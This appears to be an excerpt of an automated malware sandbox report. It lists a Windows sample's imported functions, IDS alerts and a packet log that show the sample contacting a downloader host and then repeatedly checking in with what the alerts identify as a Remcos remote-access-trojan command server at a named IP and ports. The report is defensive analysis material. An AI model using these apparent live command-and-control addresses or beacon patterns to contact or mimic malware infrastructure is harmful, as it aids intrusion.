SHELL32.dll	SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
ole32.dll	CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll	MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
GDI32.dll	GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
KERNEL32.dll	RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, WriteFile, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, CopyFileW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-14T15:42:21.159945+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.5	49978	109.99.162.14	443	TCP
2025-01-14T15:42:27.059228+0100	2032776	ET MALWARE Remcos 3.x Unencrypted Checkin	1	192.168.2.5	49979	43.226.229.209	3980	TCP
2025-01-14T15:42:29.698777+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.5	49980	43.226.229.209	3981	TCP
2025-01-14T15:42:30.732264+0100	2032776	ET MALWARE Remcos 3.x Unencrypted Checkin	1	192.168.2.5	49981	43.226.229.209	3980	TCP
2025-01-14T15:42:33.363017+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.5	49982	43.226.229.209	3981	TCP
2025-01-14T15:42:34.391044+0100	2032776	ET MALWARE Remcos 3.x Unencrypted Checkin	1	192.168.2.5	49983	43.226.229.209	3980	TCP
2025-01-14T15:42:37.051458+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.5	49984	43.226.229.209	3981	TCP
2025-01-14T15:42:38.109274+0100	2032776	ET MALWARE Remcos 3.x Unencrypted Checkin	1	192.168.2.5	49985	43.226.229.209	3980	TCP
2025-01-14T15:42:40.810433+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.5	49986	43.226.229.209	3981	TCP
2025-01-14T15:42:41.841612+0100	2032776	ET MALWARE Remcos 3.x Unencrypted Checkin	1	192.168.2.5	49987	43.226.229.209	3980	TCP
2025-01-14T15:42:44.541062+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.5	49988	43.226.229.209	3981	TCP
2025-01-14T15:42:45.576043+0100	2032776	ET MALWARE Remcos 3.x Unencrypted Checkin	1	192.168.2.5	49989	43.226.229.209	3980	TCP
2025-01-14T15:42:48.217968+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.5	49990	43.226.229.209	3981	TCP
2025-01-14T15:42:49.233656+0100	2032776	ET MALWARE Remcos 3.x Unencrypted Checkin	1	192.168.2.5	49991	43.226.229.209	3980	TCP
2025-01-14T15:42:51.901137+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.5	49992	43.226.229.209	3981	TCP
2025-01-14T15:42:52.935342+0100	2032776	ET MALWARE Remcos 3.x Unencrypted Checkin	1	192.168.2.5	49993	43.226.229.209	3980	TCP
2025-01-14T15:42:55.612992+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.5	49994	43.226.229.209	3981	TCP
2025-01-14T15:42:56.623911+0100	2032776	ET MALWARE Remcos 3.x Unencrypted Checkin	1	192.168.2.5	49995	43.226.229.209	3980	TCP
2025-01-14T15:42:59.283210+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.5	49996	43.226.229.209	3981	TCP
2025-01-14T15:43:00.310270+0100	2032776	ET MALWARE Remcos 3.x Unencrypted Checkin	1	192.168.2.5	49997	43.226.229.209	3980	TCP
2025-01-14T15:43:02.985662+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.5	49998	43.226.229.209	3981	TCP
2025-01-14T15:43:03.997903+0100	2032776	ET MALWARE Remcos 3.x Unencrypted Checkin	1	192.168.2.5	49999	43.226.229.209	3980	TCP
2025-01-14T15:43:06.666825+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.5	50000	43.226.229.209	3981	TCP
2025-01-14T15:43:07.701426+0100	2032776	ET MALWARE Remcos 3.x Unencrypted Checkin	1	192.168.2.5	50001	43.226.229.209	3980	TCP
2025-01-14T15:43:10.354616+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.5	50002	43.226.229.209	3981	TCP
2025-01-14T15:43:11.372776+0100	2032776	ET MALWARE Remcos 3.x Unencrypted Checkin	1	192.168.2.5	50003	43.226.229.209	3980	TCP
2025-01-14T15:43:14.000222+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.5	50004	43.226.229.209	3981	TCP
2025-01-14T15:43:15.029106+0100	2032776	ET MALWARE Remcos 3.x Unencrypted Checkin	1	192.168.2.5	50005	43.226.229.209	3980	TCP
2025-01-14T15:43:17.680003+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.5	50006	43.226.229.209	3981	TCP
2025-01-14T15:43:18.782844+0100	2032776	ET MALWARE Remcos 3.x Unencrypted Checkin	1	192.168.2.5	50007	43.226.229.209	3980	TCP
2025-01-14T15:43:21.414273+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.5	50008	43.226.229.209	3981	TCP
2025-01-14T15:43:22.435609+0100	2032776	ET MALWARE Remcos 3.x Unencrypted Checkin	1	192.168.2.5	50009	43.226.229.209	3980	TCP
2025-01-14T15:43:25.106962+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.5	50010	43.226.229.209	3981	TCP
2025-01-14T15:43:26.122511+0100	2032776	ET MALWARE Remcos 3.x Unencrypted Checkin	1	192.168.2.5	50011	43.226.229.209	3980	TCP
2025-01-14T15:43:28.780669+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.5	50012	43.226.229.209	3981	TCP
2025-01-14T15:43:29.810398+0100	2032776	ET MALWARE Remcos 3.x Unencrypted Checkin	1	192.168.2.5	50013	43.226.229.209	3980	TCP
2025-01-14T15:43:32.465387+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.5	50014	43.226.229.209	3981	TCP
2025-01-14T15:43:33.482595+0100	2032776	ET MALWARE Remcos 3.x Unencrypted Checkin	1	192.168.2.5	50015	43.226.229.209	3980	TCP
2025-01-14T15:43:36.189030+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.5	50016	43.226.229.209	3981	TCP
2025-01-14T15:43:37.218328+0100	2032776	ET MALWARE Remcos 3.x Unencrypted Checkin	1	192.168.2.5	50017	43.226.229.209	3980	TCP
2025-01-14T15:43:39.883020+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.5	50018	43.226.229.209	3981	TCP
2025-01-14T15:43:40.904556+0100	2032776	ET MALWARE Remcos 3.x Unencrypted Checkin	1	192.168.2.5	50019	43.226.229.209	3980	TCP
2025-01-14T15:43:43.560205+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.5	50020	43.226.229.209	3981	TCP
2025-01-14T15:43:44.593686+0100	2032776	ET MALWARE Remcos 3.x Unencrypted Checkin	1	192.168.2.5	50021	43.226.229.209	3980	TCP
2025-01-14T15:43:47.316159+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.5	50022	43.226.229.209	3981	TCP
2025-01-14T15:43:48.327339+0100	2032776	ET MALWARE Remcos 3.x Unencrypted Checkin	1	192.168.2.5	50023	43.226.229.209	3980	TCP
2025-01-14T15:43:51.006361+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.5	50024	43.226.229.209	3981	TCP
2025-01-14T15:43:52.028883+0100	2032776	ET MALWARE Remcos 3.x Unencrypted Checkin	1	192.168.2.5	50025	43.226.229.209	3980	TCP
2025-01-14T15:43:54.684683+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.5	50026	43.226.229.209	3981	TCP
2025-01-14T15:43:55.700248+0100	2032776	ET MALWARE Remcos 3.x Unencrypted Checkin	1	192.168.2.5	50027	43.226.229.209	3980	TCP
2025-01-14T15:43:58.413124+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.5	50028	43.226.229.209	3981	TCP
2025-01-14T15:43:59.450332+0100	2032776	ET MALWARE Remcos 3.x Unencrypted Checkin	1	192.168.2.5	50029	43.226.229.209	3980	TCP
2025-01-14T15:44:02.141533+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.5	50030	43.226.229.209	3981	TCP
2025-01-14T15:44:03.378073+0100	2032776	ET MALWARE Remcos 3.x Unencrypted Checkin	1	192.168.2.5	50031	43.226.229.209	3980	TCP
2025-01-14T15:44:06.062993+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.5	50032	43.226.229.209	3981	TCP
2025-01-14T15:44:10.294478+0100	2032776	ET MALWARE Remcos 3.x Unencrypted Checkin	1	192.168.2.5	50033	43.226.229.209	3980	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2025 15:42:19.777183056 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:19.777272940 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:19.777463913 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:19.812690973 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:19.812716961 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:20.817724943 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:20.817858934 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:20.914540052 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:20.914572954 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:20.914902925 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:20.914957047 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:20.925978899 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:20.971338987 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.159946918 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.159989119 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.160140038 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.160171032 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.162990093 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.281821012 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.281907082 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.282777071 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.282834053 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.283349991 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.283404112 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.284296036 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.284347057 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.403676987 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.403826952 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.404401064 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.404476881 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.405245066 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.405311108 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.405323982 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.405339003 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.405378103 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.405392885 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.406100988 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.406169891 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.407027960 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.407098055 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.407898903 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.407963991 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.526005983 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.526066065 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.526217937 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.526247025 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.526290894 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.526299000 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.526354074 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.526412964 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.526674986 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.526735067 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.526740074 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.526751995 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.526794910 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.527651072 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.527700901 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.527740002 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.527740002 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.527748108 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.527781963 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.528541088 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.528603077 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.528680086 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.528723001 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.528738976 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.528744936 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.528757095 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.528786898 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.529617071 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.529663086 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.529679060 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.529685974 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.529709101 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.529723883 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.530353069 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.530416965 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.617896080 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.618016005 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.618089914 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.618144035 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.647340059 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.647418022 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.647499084 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.647556067 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.647726059 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.647866964 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.648128033 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.648191929 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.648327112 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.648394108 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.648598909 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.648655891 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.648798943 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.648878098 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.648926020 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.648983002 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.652415037 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.652461052 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.652540922 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.652560949 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.652575970 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.652602911 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.652631044 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.652724981 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.653028011 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.653076887 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.653235912 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.653348923 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.653390884 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.653445005 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.653465986 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.653588057 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.710585117 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.710642099 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.710704088 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.710738897 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.710756063 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.710777044 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.740030050 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.740071058 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.740200043 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.740236044 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.740252018 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.740274906 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.740552902 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.740601063 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.740601063 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.740613937 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.740642071 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.740677118 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.740737915 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.740916967 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.740962982 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.740986109 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.741035938 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.741169930 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.741228104 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.741297007 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.741355896 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.741385937 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.741446018 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.741569042 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.741645098 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.741697073 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.741745949 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.769308090 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.769401073 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.769404888 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.769442081 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.769459009 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.769474983 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.803827047 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.803904057 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.803931952 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.803970098 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.803992033 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.804009914 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.832619905 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.832688093 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.832726955 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.832763910 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.832783937 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.832783937 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:21.832802057 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.832832098 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.835653067 CET	49978	443	192.168.2.5	109.99.162.14
Jan 14, 2025 15:42:21.835685968 CET	443	49978	109.99.162.14	192.168.2.5
Jan 14, 2025 15:42:27.046217918 CET	49979	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:27.051162958 CET	3980	49979	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:27.051255941 CET	49979	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:27.059227943 CET	49979	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:27.064183950 CET	3980	49979	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:28.363303900 CET	3980	49979	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:28.363548040 CET	49979	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:28.363879919 CET	49979	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:28.366862059 CET	49980	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:28.368932009 CET	3980	49979	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:28.371665955 CET	3981	49980	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:28.371751070 CET	49980	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:28.376255989 CET	49980	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:28.381289005 CET	3981	49980	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:29.698705912 CET	3981	49980	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:29.698776960 CET	49980	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:29.699544907 CET	49980	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:29.704341888 CET	3981	49980	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:30.726569891 CET	49981	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:30.731400967 CET	3980	49981	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:30.731497049 CET	49981	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:30.732264042 CET	49981	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:30.737009048 CET	3980	49981	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:32.038722992 CET	3980	49981	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:32.038872957 CET	49981	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:32.039114952 CET	49981	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:32.040844917 CET	49982	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:32.044296026 CET	3980	49981	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:32.046164989 CET	3981	49982	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:32.046242952 CET	49982	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:32.050437927 CET	49982	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:32.055253983 CET	3981	49982	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:33.362782955 CET	3981	49982	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:33.363017082 CET	49982	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:33.363796949 CET	49982	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:33.368546009 CET	3981	49982	43.226.229.209	192.168.2.5
Jan 14, 2025 15:42:34.383200884 CET	49983	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:42:34.389625072 CET	3980	49983	43.226.229.209	192.168.2.5
